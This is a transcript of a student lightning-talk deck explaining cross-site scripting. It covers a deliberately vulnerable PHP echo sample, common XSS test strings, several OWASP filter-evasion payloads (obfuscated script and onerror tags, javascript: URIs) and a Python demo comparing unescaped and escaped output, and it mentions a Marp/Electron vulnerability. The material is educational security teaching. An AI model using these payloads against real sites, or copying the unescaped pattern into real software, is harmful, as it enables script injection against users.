I looked into XSS input values / searching xss insertion value
Tomoyuki KOYAMA
February 03, 2018
Technology
2018/02/03 Student LT at freee
Transcript
XSS
Self-introduction: B1. Twitter: @tmyk_kym. Blog: https://blog.koyama.me/. Interests: Network/Web/Server/Security. PyCon JP, Seccamp, etc.
XSS (Cross Site Scripting), HTML. CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE 3.0)
Sample (PHP):
<!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode']; ?></h1>

With $_GET['mode'] = hello the output is:
<!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1>hello</h1>

With $_GET['mode'] = <script>alert()</script> the output is:
<!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><script>alert()</script></h1>
Types of XSS: Stored XSS, Reflected XSS, DOM Based XSS
XSS == XSS
Commonly cited XSS test strings:
<script>alert(1)</script>
"><script>alert(1)</script>
" onmouseover="alert(1)
x" onerror="alert(1)   <- img src
javascript:alert(1)    <- a href
Source: OWASP XSS Filter Evasion Cheat Sheet (2015) - OWASP https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html
Three examples picked from it:
[1] <SCRIPT/XSS SRC="http://example.com/xss.js"></SCRIPT>
    The browser treats /XSS as an attribute and parses it as: <script xss="" src="http://example.com/xss.js"></script>
[2] <<SCRIPT>alert("XSS");//<</SCRIPT>
    The HTML parser tolerates the extra <; rendered as: "><script> alert("XSS");//< </script>
[3] <img src=x onerror=javas cript:ale rt('XSS')>
    &#x... hexadecimal (base-16) HTML character references inside the handler; rendered as: <img src="x" onerror="javascript:alert('XSS')">
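Added example (not from the slides): it mirrors the slide's PHP `<h1><?php echo $_GET['mode']; ?></h1>` in Python, once unescaped and once with htmlspecialchars-style output encoding, and runs the three cheat-sheet inputs above through Python's stdlib html.parser to show which tags and attributes a tolerant parser extracts from each rendering. Function names, the TagCollector helper and the payload labels are assumptions of this example; html.parser is a tokenizer, not a browser, so the point is the created tags, not script execution.

```python
from html import escape
from html.parser import HTMLParser

# Same document the slide's PHP produces: <h1><?php echo $_GET['mode']; ?></h1>
TEMPLATE = ('<!doctype html><meta charset="utf-8"><title>XSS Sample</title>'
            '<h1>{}</h1>')


def render_unsafe(mode: str) -> str:
    """Mirror of the slide's `echo $_GET['mode']`: input goes out as-is."""
    return TEMPLATE.format(mode)


def render_safe(mode: str) -> str:
    """Same page with htmlspecialchars(..., ENT_QUOTES)-style output encoding."""
    return TEMPLATE.format(escape(mode, quote=True))


class TagCollector(HTMLParser):
    """Records every start tag (lower-cased) together with its attributes."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def injected_tags(html: str):
    """Start tags that are not part of TEMPLATE, i.e. ones the input created."""
    p = TagCollector()
    p.feed(html)
    p.close()
    return [t for t in p.tags if t[0] not in ('meta', 'title', 'h1')]


# Cheat-sheet inputs [1]-[3] from the slides (constructed copies, not live data)
PAYLOADS = {
    'slash_attr': '<SCRIPT/XSS SRC="http://example.com/xss.js"></SCRIPT>',
    'double_lt': '<<SCRIPT>alert("XSS");//<</SCRIPT>',
    'tab_entity': "<img src=x onerror=javas&#x09;cript:ale&#x09;rt('XSS')>",
}

if __name__ == '__main__':
    for name, payload in PAYLOADS.items():
        print(name, 'unsafe ->', injected_tags(render_unsafe(payload)))
        print(name, 'safe   ->', injected_tags(render_safe(payload)))
```

With the unescaped rendering the parser reports a script or img tag for every input (including the `xss` attribute from [1] and the tab characters decoded from `&#x09;` in [3]); with output encoding no tag is created at all.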
Other cheat-sheet inputs shown on the slides:
<img src=javascript:alert('XSS')>
<img src=javascript: alert(String.fromCharCode(88,83,83))>
<META HTTP-EQUIV="refresh" CONTENT="3; URL=http://;URL=http://yahoo.co.jp/;">
Electron / Marp: Marp is built on Electron, i.e. on web technology. What happens when <script>alert()</script> is typed into a slide? Result: alert ...
JVN#21174546: Marp JavaScript vulnerability: https://jvn.jp/jp/JVN21174546/
From [Security issue] Remote script can read user local resource · Issue #187 · yhatt/marp: “However, sanitizing inline script should consider on future.”
XSS XSS alert() Electron